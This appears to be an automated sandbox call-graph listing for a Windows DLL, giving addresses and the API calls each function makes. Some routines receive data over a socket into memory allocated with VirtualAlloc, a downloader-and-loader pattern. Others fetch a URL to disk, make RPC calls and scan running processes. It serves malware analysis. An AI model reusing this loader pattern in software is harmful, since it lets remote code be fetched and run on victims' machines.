9893->9808 9895 100048f8 9894->9895 9896 10002190 8 API calls 9895->9896 9897 1000490e 9896->9897 10154 100046a0 GetModuleFileNameA 9897->10154 9899 10004921 _Smanip _Error_objects 10188 1000b990 9899->10188 9901 10004f87 _Smanip _Error_objects 9902 1000b990 10 API calls 9901->9902 9903 100098a2 9902->9903 10192 10004540 9903->10192 9906 10004540 10 API calls 9907 100098d3 _Error_objects 9906->9907 10198 10004120 9907->10198 10137 10010139 WSACleanup exit 10136->10137 10147 10010152 10136->10147 10153 1001031d 10137->10153 10138 100101f5 freeaddrinfo 10142 10010209 WSACleanup exit 10138->10142 10149 10010222 10138->10149 10139 1001016d socket 10140 10010196 WSACleanup exit 10139->10140 10141 100101af connect 10139->10141 10140->10153 10143 100101d3 closesocket 10141->10143 10144 100101ee 10141->10144 10142->10153 10143->10147 10144->10138 10145 10010229 recv 10146 100102a1 10145->10146 10145->10149 10150 100102a7 10146->10150 10151 100102ab closesocket WSACleanup free exit 10146->10151 10147->10138 10147->10139 10148 10010276 realloc 10148->10149 10149->10145 10149->10148 10152 100102e8 VirtualAlloc memmove 10149->10152 10150->10152 10151->10153 10152->10153 10155 10002190 8 API calls 10154->10155 10156 100046e8 10155->10156 10157 10001ec0 9 API calls 10156->10157 10158 10004716 10157->10158 10159 10001ec0 9 API calls 10158->10159 10160 1000472f 10159->10160 10262 1000ba80 10160->10262 10163 10001ec0 9 API calls 10164 1000475a 10163->10164 10165 10001ec0 9 API calls 10164->10165 10170 10004773 _Error_objects 10165->10170 10166 100047da 10272 1000d1d0 10166->10272 10170->10166 10266 1000bd90 10170->10266 10269 1000bd70 10170->10269 10171 10002f30 11 API calls 10173 10004815 10171->10173 10174 100020a0 2 API calls 10173->10174 10175 10004830 10174->10175 10176 100020a0 2 API calls 10175->10176 10177 1000483c 10176->10177 10178 100020a0 2 API calls 10177->10178 10179 1000484b 10178->10179 10180 100020a0 2 API calls 10179->10180 10181 1000485a 10180->10181 10182 100020a0 2 API calls 10181->10182 10183 10004866 10182->10183 10184 100020a0 2 API calls 10183->10184 10185 10004875 10184->10185 10186 100020a0 2 API calls 10185->10186 10187 10004884 10186->10187 10187->9899 10189 1000b9b0 HandleT 10188->10189 10318 1000d590 10189->10318 10191 1000b9e9 10191->9901 10193 10004571 _Error_objects 10192->10193 10352 1000bb30 10193->10352 10195 10004595 HandleT 10196 100045dd 10195->10196 10197 1000bc00 Concurrency::task_continuation_context::task_continuation_context 10 API calls 10195->10197 10196->9906 10197->10195 10199 1000414a 10198->10199 10384 1000b910 10199->10384 10201 10004168 10203 1000421b _Error_objects 10201->10203 10390 1000b950 10201->10390 10393 1000cd10 10203->10393 10205 10004237 10207 1000b950 10 API calls 10205->10207 10206 1000426c 10209 1000b950 10 API calls 10206->10209 10207->10203 10211 1000429c 10209->10211 10210 1000431d 10397 10004020 MultiByteToWideChar 10210->10397 10212 1000b950 10 API calls 10211->10212 10212->10203 10263 1000ba92 Concurrency::task_continuation_context::task_continuation_context 10262->10263 10278 1000d6f0 10263->10278 10267 10002010 11 API calls 10266->10267 10268 1000bda3 10267->10268 10268->10170 10285 1000bc00 10269->10285 10271 1000bd84 10271->10170 10273 1000d1e5 Concurrency::task_continuation_context::task_continuation_context 10272->10273 10275 1000d208 10273->10275 10307 100015e0 ?_Xlength_error@std@@YAXPBD 10273->10307 10308 1000df80 10275->10308 10277 100047f1 10277->10171 10279 10004742 10278->10279 10280 1000d6fe 10278->10280 10279->10163 10280->10279 10283 10003b20 memchr 10280->10283 10284 1000e0e0 memcmp 10280->10284 10283->10280 10284->10280 10286 1000bc64 10285->10286 10288 1000bc1d Concurrency::task_continuation_context::task_continuation_context 10285->10288 10289 1000d8a0 10286->10289 10288->10271 10290 1000d8c0 Concurrency::task_continuation_context::task_continuation_context 10289->10290 10292 1000d8cd Concurrency::task_continuation_context::task_continuation_context 10290->10292 10302 100015e0 ?_Xlength_error@std@@YAXPBD 10290->10302 10293 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10292->10293 10294 1000d907 HandleT Concurrency::task_continuation_context::task_continuation_context 10293->10294 10295 1000d984 10294->10295 10296 1000d93c HandleT 10294->10296 10297 1000bc90 Concurrency::task_continuation_context::task_continuation_context memmove 10295->10297 10303 1000bc90 10296->10303 10301 1000d977 Concurrency::task_continuation_context::task_continuation_context 10297->10301 10299 1000d966 10300 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 10299->10300 10300->10301 10301->10288 10302->10292 10306 10002ac0 memmove 10303->10306 10305 1000bcaa Concurrency::task_continuation_context::task_continuation_context 10305->10299 10306->10305 10307->10275 10313 1000dfac HandleT Concurrency::task_continuation_context::task_continuation_context 10308->10313 10310 1000e08a 10317 10002ac0 memmove 10310->10317 10312 1000e0a1 Concurrency::task_continuation_context::task_continuation_context 10312->10277 10314 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10313->10314 10315 1000e042 HandleT Concurrency::task_continuation_context::task_continuation_context 10313->10315 10314->10315 10316 10002ac0 memmove 10315->10316 10316->10310 10317->10312 10319 1000d5b6 Concurrency::task_continuation_context::task_continuation_context 10318->10319 10320 1000d630 Concurrency::task_continuation_context::task_continuation_context 10319->10320 10326 1000dc50 10319->10326 10320->10191 10327 1000dc5f 10326->10327 10328 1000dc69 10327->10328 10340 1000c520 ?_Xlength_error@std@@YAXPBD 10327->10340 10341 1000e150 10328->10341 10332 1000e7b0 10333 1000e7d4 HandleT 10332->10333 10345 1000eb90 10333->10345 10335 1000d611 10336 1000daf0 10335->10336 10337 1000db09 10336->10337 10338 1000daff 10336->10338 10337->10320 10348 1000c540 10338->10348 10340->10328 10342 1000e183 Concurrency::task_continuation_context::task_continuation_context 10341->10342 10343 10003bb0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10342->10343 10344 1000d5e9 10343->10344 10344->10332 10346 1000eb9f 10345->10346 10347 1000ebbd memmove 10346->10347 10347->10335 10349 1000c566 Concurrency::task_continuation_context::task_continuation_context 10348->10349 10350 10002e00 allocator 2 API calls 10349->10350 10351 1000c5c9 10349->10351 10350->10351 10351->10337 10353 1000bb44 10352->10353 10354 1000bb46 10352->10354 10353->10195 10354->10353 10355 1000bb5e 10354->10355 10357 1000bb8c Concurrency::task_continuation_context::task_continuation_context 10354->10357 10359 1000d790 10355->10359 10357->10353 10372 1000c660 10357->10372 10360 1000d7b0 Concurrency::task_continuation_context::task_continuation_context 10359->10360 10362 1000d7bd Concurrency::task_continuation_context::task_continuation_context 10360->10362 10378 100015e0 ?_Xlength_error@std@@YAXPBD 10360->10378 10363 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10362->10363 10364 1000d7f7 HandleT Concurrency::task_continuation_context::task_continuation_context 10363->10364 10365 1000d82c HandleT 10364->10365 10366 1000d86f 10364->10366 10379 1000bbb0 10365->10379 10367 1000bbb0 memmove 10366->10367 10371 1000d862 Concurrency::task_continuation_context::task_continuation_context 10367->10371 10370 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 10370->10371 10371->10353 10373 1000c677 HandleT Concurrency::task_continuation_context::task_continuation_context 10372->10373 10383 10002ac0 memmove 10373->10383 10375 1000c6b3 Concurrency::task_continuation_context::task_continuation_context 10376 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 10375->10376 10377 1000c6d5 10376->10377 10377->10353 10378->10362 10382 10002ac0 memmove 10379->10382 10381 1000bbcb 10381->10370 10382->10381 10383->10375 10385 1000b91f 10384->10385 10386 1000b936 10385->10386 10389 1000b943 10385->10389 10403 1000c520 ?_Xlength_error@std@@YAXPBD 10385->10403 10404 1000d430 10386->10404 10389->10201 10420 1000d520 10390->10420 10392 10004209 10392->10203 10392->10205 10392->10206 10394 1000cd45 HandleT 10393->10394 10396 1000cd82 _Error_objects 10394->10396 10440 1000e3a0 10394->10440 10396->10210 10461 10010b54 10397->10461 10403->10386 10405 1000d45d Concurrency::task_continuation_context::task_continuation_context 10404->10405 10406 10003bb0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10405->10406 10407 1000d48f 10406->10407 10412 1000e4c0 10407->10412 10413 1000e4e4 HandleT 10412->10413 10414 1000eb90 memmove 10413->10414 10415 1000d4b5 10414->10415 10416 1000dbb0 10415->10416 10417 1000dbc1 Concurrency::task_continuation_context::task_continuation_context 10416->10417 10418 1000d502 10417->10418 10419 10002e00 allocator 2 API calls 10417->10419 10418->10389 10419->10418 10421 1000d553 10420->10421 10423 1000d545 10420->10423 10424 1000e5f0 10421->10424 10423->10392 10425 1000e61d Concurrency::task_continuation_context::task_continuation_context 10424->10425 10426 1000e65f 10425->10426 10439 1000c520 ?_Xlength_error@std@@YAXPBD 10425->10439 10428 10003bb0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10426->10428 10429 1000e685 HandleT 10428->10429 10430 1000e6f6 10429->10430 10431 1000e6d8 10429->10431 10433 1000e4c0 memmove 10430->10433 10432 1000e4c0 memmove 10431->10432 10436 1000e6f1 10432->10436 10434 1000e70d 10433->10434 10435 1000e4c0 memmove 10434->10435 10435->10436 10437 1000dbb0 2 API calls 10436->10437 10438 1000e791 10437->10438 10438->10423 10439->10426 10441 1000e3cc Concurrency::task_continuation_context::task_continuation_context 10440->10441 10443 1000e40c Concurrency::task_continuation_context::task_continuation_context 10441->10443 10450 100015e0 ?_Xlength_error@std@@YAXPBD 10441->10450 10444 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10443->10444 10446 1000e42f Concurrency::task_continuation_context::task_continuation_context 10443->10446 10444->10446 10451 1000eb40 10446->10451 10447 1000e47b Concurrency::task_continuation_context::task_continuation_context 10454 1000ea90 10447->10454 10450->10443 10458 1000ecb0 10451->10458 10455 1000ea9f 10454->10455 10457 1000e4ae 10454->10457 10456 10002620 2 API calls 10455->10456 10456->10457 10457->10396 10459 1000eb90 memmove 10458->10459 10460 1000eb54 10459->10460 10460->10447 11647 2870b33 11648 2870b36 11647->11648 11649 2870b87 __DllMainCRTStartup@12 6 API calls 11648->11649 11650 2870b44 __DllMainCRTStartup@12 11648->11650 11649->11650 11651 100113b5 11654 100116df 11651->11654 11655 100113c3 _except_handler4_common 11654->11655 11200 1000e739 11201 1000e74a 11200->11201 11202 10002e00 allocator 2 API calls 11201->11202 11203 1000e75d _CxxThrowException 11202->11203 11083 1000d4ba 11084 10002e00 allocator 2 API calls 11083->11084 11085 1000d4cc _CxxThrowException 11084->11085 11086 1000d0bc 11087 1000d0c3 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 11086->11087 11088 1000be70 3 API calls 11087->11088 11089 1000d0f9 11088->11089 10822 10001040 10825 10004000 10822->10825 10828 10003f30 10825->10828 10831 1000cc90 10828->10831 10832 1000cca3 10831->10832 10835 1000e370 10832->10835 10834 10001051 10838 1000cc80 10835->10838 10837 1000e38d memset 10837->10834 10838->10837 10839 10001440 10844 10001470 10839->10844 10842 10001462 10850 100013f0 10844->10850 10847 10010b1e 10854 100113e4 10847->10854 10853 10001300 __std_exception_destroy 10850->10853 10852 100013ff 10852->10842 10852->10847 10853->10852 10855 10011691 free 10854->10855 11090 100014c0 11093 100014f0 11090->11093 11096 100012c0 __std_exception_copy 11093->11096 11095 100014d3 11096->11095 11204 28701c7 11205 287017b 11204->11205 11206 2870131 11204->11206 11207 2870144 socket 11206->11207 11208 28701cc FreeAddrInfoW 11206->11208 11209 2870186 connect 11207->11209 11210 287016d WSACleanup 11207->11210 11211 28701e0 WSACleanup 11208->11211 11212 28701f9 11208->11212 11213 28701c5 11209->11213 11214 28701aa closesocket 11209->11214 11210->11205 11211->11205 11212->11205 11215 2870200 recv 11212->11215 11216 2870282 closesocket WSACleanup 11212->11216 11217 287027e 11212->11217 11218 28702bf VirtualAlloc 11212->11218 11213->11208 11214->11206 11215->11212 11216->11212 11217->11218 11218->11205 11100 100024cb 11101 100024d3 Concurrency::task_continuation_context::task_continuation_context 11100->11101 11103 100024da _Error_objects Concurrency::task_continuation_context::task_continuation_context 11101->11103 11104 10002ae0 memmove 11101->11104 11104->11103 11661 2871549 IsProcessorFeaturePresent 11662 287155e 11661->11662 11665 2871521 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11662->11665 11664 2871641 11665->11664 11219 1000b350 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11220 1000b36b ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11219->11220 11228 1000b3ef Concurrency::task_continuation_context::task_continuation_context 11219->11228 11221 1000b383 Concurrency::task_continuation_context::task_continuation_context 11220->11221 11220->11228 11222 1000b3d0 ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11221->11222 11223 1000b39c ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11221->11223 11224 1000b3e2 Concurrency::task_continuation_context::task_continuation_context 11222->11224 11227 1000b3bd 11223->11227 11225 1000b459 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11225->11224 11226 1000b46c 11225->11226 11234 1000c0c0 ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11226->11234 11227->11222 11227->11228 11228->11224 11228->11225 11232 10003ef0 ungetc 11228->11232 11233 10003f0d 11232->11233 11233->11224 11233->11225 11235 1000c0f8 ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00 11234->11235 11236 1000c0da ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11234->11236 11235->11224 11236->11235 10857 10011c50 10858 10011c6c 10857->10858 10859 10011c5c ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 10857->10859 10859->10858 11666 2861b57 11669 2861b87 11666->11669 11685 2871737 11669->11685 11672 2861bd5 HttpQueryInfoW 11673 2861c11 SendMessageW 11672->11673 11674 2861c28 InternetReadFile 11672->11674 11673->11674 11675 2861cfe InternetCloseHandle InternetCloseHandle GetParent ShowWindow 11674->11675 11676 2861c4a 11674->11676 11678 2861727 6 API calls 11675->11678 11676->11674 11676->11675 11682 2861ce8 SendMessageW 11676->11682 11679 2861d42 11678->11679 11680 2861727 6 API calls 11679->11680 11681 2861d52 11680->11681 11687 286f307 11681->11687 11682->11676 11686 2861b94 InternetOpenA InternetOpenUrlA 11685->11686 11686->11672 11688 286f329 11687->11688 11707 286ee57 RpcStringBindingComposeW 11688->11707 11694 286f388 _swprintf 11722 286ff17 NdrClientCall2 11694->11722 11696 286f405 Sleep 11697 286f057 5 API calls 11696->11697 11698 286f3e1 11697->11698 11698->11696 11699 286f42e 11698->11699 11702 2861b7a 11698->11702 11723 286f1e7 11699->11723 11701 286f456 Sleep 11704 286f43b 11701->11704 11704->11701 11704->11702 11705 286f49b 11704->11705 11726 286f237 CreateToolhelp32Snapshot 11704->11726 11706 286f217 NdrClientCall2 11705->11706 11706->11702 11708 286eea4 11707->11708 11709 286eea8 RpcBindingFromStringBindingW RpcBindingSetAuthInfoExA RpcStringFreeW 11707->11709 11710 286f057 11708->11710 11709->11708 11714 286f080 11710->11714 11712 286f1a5 CoTaskMemFree 11712->11714 11713 286f1b8 CoTaskMemFree 11713->11714 11715 286f0ba 11713->11715 11714->11712 11714->11713 11714->11715 11716 286f148 11714->11716 11735 286ff47 NdrClientCall2 11714->11735 11715->11694 11719 286f217 11715->11719 11717 286f175 CoTaskMemFree 11716->11717 11718 286f162 CoTaskMemFree 11716->11718 11717->11715 11718->11716 11736 286ffc7 NdrClientCall2 11719->11736 11721 286f229 11721->11694 11722->11698 11737 286ff87 NdrClientCall2 11723->11737 11725 286f208 11725->11704 11727 286f253 11726->11727 11728 286f25a Process32FirstW 11726->11728 11727->11704 11729 286f2ac 11728->11729 11730 286f279 11728->11730 11732 286f2d7 Process32NextW 11729->11732 11733 286f2c9 CloseHandle 11729->11733 11731 286f29e CloseHandle 11730->11731 11731->11727 11732->11729 11734 286f2ec CloseHandle 11732->11734 11733->11727 11734->11727 11735->11714 11736->11721 11737->11725 10860 28642d5 10861 28642f4 10860->10861 10864 2863ff7 MultiByteToWideChar 10861->10864 10863 2864306 10865 2864032 10864->10865 10866 2864050 MultiByteToWideChar WideCharToMultiByte 10865->10866 10867 2864095 10866->10867 10868 28640b3 WideCharToMultiByte 10867->10868 10869 28640d9 10868->10869 10869->10863 11237 10010b5d 11238 10010b68 11237->11238 11239 10010b9b 11237->11239 11242 10010b6d 11238->11242 11243 10010bb0 11238->11243 11240 10010cb7 __DllMainCRTStartup@12 15 API calls 11239->11240 11240->11242 11244 10010bbc ___scrt_is_nonwritable_in_current_image 11243->11244 11261 10010942 11244->11261 11246 10010bc3 __DllMainCRTStartup@12 11247 10010bea 11246->11247 11248 10010caf 11246->11248 11255 10010c4a ___scrt_is_nonwritable_in_current_image 11246->11255 11265 100108a4 11247->11265 11249 1001124d __DllMainCRTStartup@12 6 API calls 11248->11249 11251 10010cb6 11249->11251 11252 10010bf9 __RTC_Initialize 11252->11255 11268 100114a3 InitializeSListHead 11252->11268 11254 10010c07 11256 10010c0c _initterm_e 11254->11256 11255->11242 11256->11255 11257 10010c21 11256->11257 11269 10010879 11257->11269 11259 10010c26 11259->11255 11260 10010c2a _initterm 11259->11260 11260->11255 11262 1001094b 11261->11262 11278 10010f10 IsProcessorFeaturePresent 11262->11278 11264 10010957 ___scrt_uninitialize_crt 11264->11246 11280 1001097b 11265->11280 11267 100108ab 11267->11252 11268->11254 11270 1001087e ___scrt_release_startup_lock 11269->11270 11271 10010882 11270->11271 11273 10010889 11270->11273 11272 10010f10 IsProcessorFeaturePresent 11271->11272 11274 10010887 11272->11274 11275 1001088e _configure_narrow_argv 11273->11275 11274->11259 11276 10010899 11275->11276 11277 1001089c _initialize_narrow_environment 11275->11277 11276->11259 11277->11274 11279 10010f34 11278->11279 11279->11264 11281 10010987 11280->11281 11282 1001098b 11280->11282 11281->11267 11283 100109fa 11282->11283 11286 10010998 ___scrt_release_startup_lock 11282->11286 11284 1001124d __DllMainCRTStartup@12 6 API calls 11283->11284 11285 10010a01 11284->11285 11287 100109a5 _initialize_onexit_table 11286->11287 11288 100109c3 11286->11288 11287->11288 11289 100109b4 _initialize_onexit_table 11287->11289 11288->11267 11289->11288 11738 1000adde 11739 1000ae54 11738->11739 11742 1000ade5 11738->11742 11740 1000ae97 11739->11740 11743 1000ae6b fwrite 11739->11743 11741 1000ae11 ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11746 10002ac0 memmove 11741->11746 11742->11739 11742->11741 11743->11740 11745 1000ae28 ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH 11745->11739 11746->11745 11105 100108de 11107 100108e6 ___scrt_release_startup_lock 11105->11107 11106 10010903 _seh_filter_dll 11107->11106 9233 10001a60 9234 10001a81 6 API calls 9233->9234 9235 10001a72 9233->9235 9242 10001f50 9234->9242 9237 10001b52 PostQuitMessage 9235->9237 9238 10001a7c DefWindowProcW 9235->9238 9241 10001b75 9237->9241 9238->9241 9239 10001b32 CreateThread 9239->9241 9244 10001b80 9239->9244 9243 10001f5f Concurrency::task_continuation_context::task_continuation_context 9242->9243 9243->9239 9247 10001bb0 9244->9247 9246 10001ba3 9262 10011760 9247->9262 9250 10001c51 InternetReadFile 9252 10001d27 fclose InternetCloseHandle InternetCloseHandle GetParent ShowWindow 9250->9252 9256 10001c73 9250->9256 9251 10001c3a SendMessageW 9251->9250 9264 10001750 9252->9264 9254 10001c7d fwrite 9254->9256 9255 10001d6b 9257 10001750 17 API calls 9255->9257 9256->9250 9256->9252 9256->9254 9258 10001d11 SendMessageW 9256->9258 9259 10001d7b 9257->9259 9258->9256 9278 1000f330 9259->9278 9263 10001bbd InternetOpenA InternetOpenUrlA fopen HttpQueryInfoW 9262->9263 9263->9250 9263->9251 9265 10001772 9264->9265 9267 100017a9 _Error_objects 9264->9267 9317 10010771 AcquireSRWLockExclusive 9265->9317 9306 10002e30 9267->9306 9268 1000177c _Error_objects 9268->9267 9322 10010b09 9268->9322 9272 100017f9 9310 10001de0 9272->9310 9275 1000180a 9314 10001dc0 9275->9314 9277 10001812 9277->9255 9279 1000f352 9278->9279 9396 1000f590 9279->9396 9286 1000f3b1 9411 1000ef30 9286->9411 9287 1000f240 NdrClientCall2 9287->9286 9293 1000f42e Sleep 9295 1000f080 5 API calls 9293->9295 9294 10001d8e exit 9294->9246 9296 1000f40a 9295->9296 9296->9293 9296->9294 9297 1000f457 9296->9297 9430 1000f210 9297->9430 9299 1000f47f Sleep 9433 1000f5b0 9299->9433 9302 10001dc0 2 API calls 9303 1000f464 9302->9303 9303->9294 9303->9299 9303->9302 9304 1000f4c4 9303->9304 9437 1000f260 CreateToolhelp32Snapshot 9303->9437 9448 1000f240 9304->9448 9307 10002e65 HandleT 9306->9307 9308 10002ea2 _Error_objects 9307->9308 9326 100038b0 9307->9326 9308->9272 9311 10001df2 HandleT Concurrency::task_continuation_context::task_continuation_context 9310->9311 9312 100023a0 2 API calls 9311->9312 9313 10001dfa 9311->9313 9312->9313 9313->9275 9315 100023a0 2 API calls 9314->9315 9316 10001dcf 9315->9316 9316->9277 9321 10010785 9317->9321 9318 1001078a ReleaseSRWLockExclusive 9318->9268 9321->9318 9391 100107c0 SleepConditionVariableSRW 9321->9391 9392 10010adb 9322->9392 9325 10010720 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 9325->9267 9327 100038dc Concurrency::task_continuation_context::task_continuation_context 9326->9327 9329 1000391c 9327->9329 9334 100015e0 ?_Xlength_error@std@@YAXPBD 9327->9334 9331 1000393f Concurrency::task_continuation_context::task_continuation_context 9329->9331 9335 100039e0 9329->9335 9338 10003b00 9331->9338 9334->9329 9342 10003b90 9335->9342 9339 10003b0f 9338->9339 9341 100039c1 9338->9341 9375 100023a0 9339->9375 9341->9308 9345 10003bd0 9342->9345 9350 10003c70 9345->9350 9351 10003be0 9350->9351 9352 10003c8a 9350->9352 9354 10003c30 9351->9354 9361 10001490 9352->9361 9355 10003c3d 9354->9355 9360 10003a05 9354->9360 9356 10003c54 9355->9356 9357 10003c46 9355->9357 9372 10001520 9356->9372 9364 10003cb0 9357->9364 9360->9331 9362 10001410 stdext::threads::lock_error::lock_error 9361->9362 9363 1000149e _CxxThrowException 9362->9363 9363->9351 9365 10003cc7 9364->9365 9366 10003ccc 9364->9366 9367 10001490 allocator _CxxThrowException 9365->9367 9368 10001520 allocator _callnewh malloc _CxxThrowException _CxxThrowException 9366->9368 9367->9366 9369 10003cd6 9368->9369 9370 10003ce4 _invalid_parameter_noinfo_noreturn 9369->9370 9371 10003cf3 9369->9371 9370->9369 9370->9370 9371->9360 9373 100107d5 allocator _callnewh malloc _CxxThrowException _CxxThrowException 9372->9373 9374 1000152c 9373->9374 9374->9360 9376 100023b7 Concurrency::task_continuation_context::task_continuation_context 9375->9376 9378 100023e8 _Error_objects 9376->9378 9379 10002b30 9376->9379 9378->9341 9382 10002dc0 9379->9382 9385 10003550 9382->9385 9386 1000357e 9385->9386 9387 10003571 9385->9387 9389 10010b1e _MallocaArrayHolder free 9386->9389 9388 10001540 allocator _invalid_parameter_noinfo_noreturn 9387->9388 9388->9386 9390 10002b5b 9389->9390 9390->9378 9391->9321 9393 10010af1 _register_onexit_function 9392->9393 9394 10010aea _crt_atexit 9392->9394 9395 1000179c 9393->9395 9394->9395 9395->9325 9451 1000f8a0 9396->9451 9399 1000ee80 RpcStringBindingComposeW 9400 1000eed1 RpcBindingFromStringBindingW RpcBindingSetAuthInfoExA RpcStringFreeW 9399->9400 9401 1000eecd 9399->9401 9400->9401 9402 1000f080 9401->9402 9403 1000f0a9 9402->9403 9405 1000f1e1 CoTaskMemFree 9403->9405 9406 1000f1ce CoTaskMemFree 9403->9406 9407 1000f0e3 9403->9407 9408 1000f171 9403->9408 9477 1000ff70 NdrClientCall2 9403->9477 9405->9403 9405->9407 9406->9403 9407->9286 9407->9287 9409 1000f18b CoTaskMemFree 9408->9409 9410 1000f19e CoTaskMemFree 9408->9410 9409->9408 9410->9407 9412 1000f5b0 8 API calls 9411->9412 9413 1000ef57 9412->9413 9414 1000f5b0 8 API calls 9413->9414 9415 1000ef6a 9414->9415 9416 1000f5b0 8 API calls 9415->9416 9417 1000ef7a 9416->9417 9419 1000efc7 9417->9419 9478 1000f550 9417->9478 9420 10001dc0 2 API calls 9419->9420 9421 1000f049 9420->9421 9422 10001dc0 2 API calls 9421->9422 9423 1000f055 9422->9423 9424 10001dc0 2 API calls 9423->9424 9425 1000f064 9424->9425 9426 1000ed40 9425->9426 9537 1000ecf0 9426->9537 9429 1000ff40 NdrClientCall2 9429->9296 9542 1000ffb0 NdrClientCall2 9430->9542 9432 1000f231 9432->9303 9434 1000f5e1 HandleT _Error_objects 9433->9434 9543 1000fad0 9434->9543 9436 1000f60a 9436->9303 9438 1000f283 Process32FirstW 9437->9438 9439 1000f27c 9437->9439 9440 1000f2a2 9438->9440 9441 1000f2d5 9438->9441 9439->9303 9557 1000cde0 9440->9557 9444 1000f2dd _wcsicmp 9441->9444 9445 1000f300 Process32NextW 9444->9445 9446 1000f2f2 CloseHandle 9444->9446 9445->9441 9447 1000f315 CloseHandle 9445->9447 9446->9439 9447->9439 9599 1000fff0 NdrClientCall2 9448->9599 9450 1000f252 9450->9294 9452 1000f8b0 HandleT 9451->9452 9455 1000f950 9452->9455 9454 1000f360 9454->9399 9456 1000f9ad 9455->9456 9459 1000f964 9455->9459 9462 1000fd40 9456->9462 9458 1000f989 _Error_objects 9458->9454 9461 1000fa10 memmove 9459->9461 9461->9458 9463 1000fd51 9462->9463 9465 1000fd5b Concurrency::task_continuation_context::task_continuation_context 9463->9465 9472 100015e0 ?_Xlength_error@std@@YAXPBD 9463->9472 9466 100039e0 6 API calls 9465->9466 9467 1000fd8c HandleT Concurrency::task_continuation_context::task_continuation_context 9466->9467 9473 1000f9d0 9467->9473 9469 1000fdc9 9470 10002b30 2 API calls 9469->9470 9471 1000fde3 Concurrency::task_continuation_context::task_continuation_context 9469->9471 9470->9471 9471->9458 9472->9465 9476 10002ae0 memmove 9473->9476 9475 1000f9ea _Error_objects 9475->9469 9476->9475 9477->9403 9479 1000f56a 9478->9479 9482 1000f630 9479->9482 9502 10002cf0 9482->9502 9484 1000f64b 9485 1000f693 9484->9485 9486 1000f66c 9484->9486 9487 1000f6b3 9485->9487 9488 1000f71d 9485->9488 9506 1000fa10 memmove 9486->9506 9507 1000fa10 memmove 9487->9507 9489 1000f803 9488->9489 9495 1000f738 9488->9495 9512 1000fc10 9489->9512 9493 1000f585 9493->9417 9494 1000f6db 9508 1000fa10 memmove 9494->9508 9509 1000fa10 memmove 9495->9509 9498 1000f7be 9510 1000fa10 memmove 9498->9510 9500 1000f7d2 9511 10002ae0 memmove 9500->9511 9503 10002d02 9502->9503 9504 10002d07 9502->9504 9525 10002de0 ?_Xout_of_range@std@@YAXPBD 9503->9525 9504->9484 9506->9493 9507->9494 9508->9493 9509->9498 9510->9500 9511->9493 9513 1000fc30 9512->9513 9515 1000fc3d Concurrency::task_continuation_context::task_continuation_context 9513->9515 9526 100015e0 ?_Xlength_error@std@@YAXPBD 9513->9526 9516 100039e0 6 API calls 9515->9516 9517 1000fc77 HandleT Concurrency::task_continuation_context::task_continuation_context 9516->9517 9518 1000fcac HandleT 9517->9518 9519 1000fcff 9517->9519 9527 1000f830 9518->9527 9520 1000f830 memmove 9519->9520 9523 1000fcf2 Concurrency::task_continuation_context::task_continuation_context 9520->9523 9523->9493 9524 10002b30 2 API calls 9524->9523 9525->9504 9526->9515 9534 10002ae0 memmove 9527->9534 9529 1000f848 9535 10002ae0 memmove 9529->9535 9531 1000f862 9536 10002ae0 memmove 9531->9536 9533 1000f897 9533->9524 9534->9529 9535->9531 9536->9533 9541 1000ece0 9537->9541 9539 1000ed0f __stdio_common_vswprintf 9540 1000ed28 9539->9540 9540->9429 9541->9539 9542->9432 9544 1000fae7 9543->9544 9546 1000faf1 Concurrency::task_continuation_context::task_continuation_context 9544->9546 9554 100015e0 ?_Xlength_error@std@@YAXPBD 9544->9554 9547 1000fb1b 9546->9547 9549 1000fb6c 9546->9549 9555 10002ae0 memmove 9547->9555 9550 100039e0 6 API calls 9549->9550 9551 1000fb93 HandleT Concurrency::task_continuation_context::task_continuation_context 9550->9551 9556 10002ae0 memmove 9551->9556 9553 1000fb3f HandleT _Error_objects Concurrency::task_continuation_context::task_continuation_context 9553->9436 9554->9546 9555->9553 9556->9553 9580 10002a80 9557->9580 9559 1000ce12 ?width@ios_base@std@ 9560 1000ce8a 9559->9560 9561 1000ce3a 9559->9561 9582 1000bec0 9560->9582 9561->9560 9562 1000ce42 ?width@ios_base@std@ 9561->9562 9562->9560 9563 1000ce61 9562->9563 9563->9560 9565 1000ce6b ?width@ios_base@std@ 9563->9565 9565->9560 9566 1000cead 9567 1000ced4 ?flags@ios_base@std@ 9566->9567 9568 1000cec6 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 9566->9568 9570 1000cf79 9567->9570 9577 1000cef9 Concurrency::task_continuation_context::task_continuation_context 9567->9577 9589 1000be70 ?uncaught_exception@std@ 9568->9589 9572 1000cf8f ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J 9570->9572 9578 1000cfc8 Concurrency::task_continuation_context::task_continuation_context 9570->9578 9572->9578 9573 1000d073 ?width@ios_base@std@@QAE_J_J 9573->9568 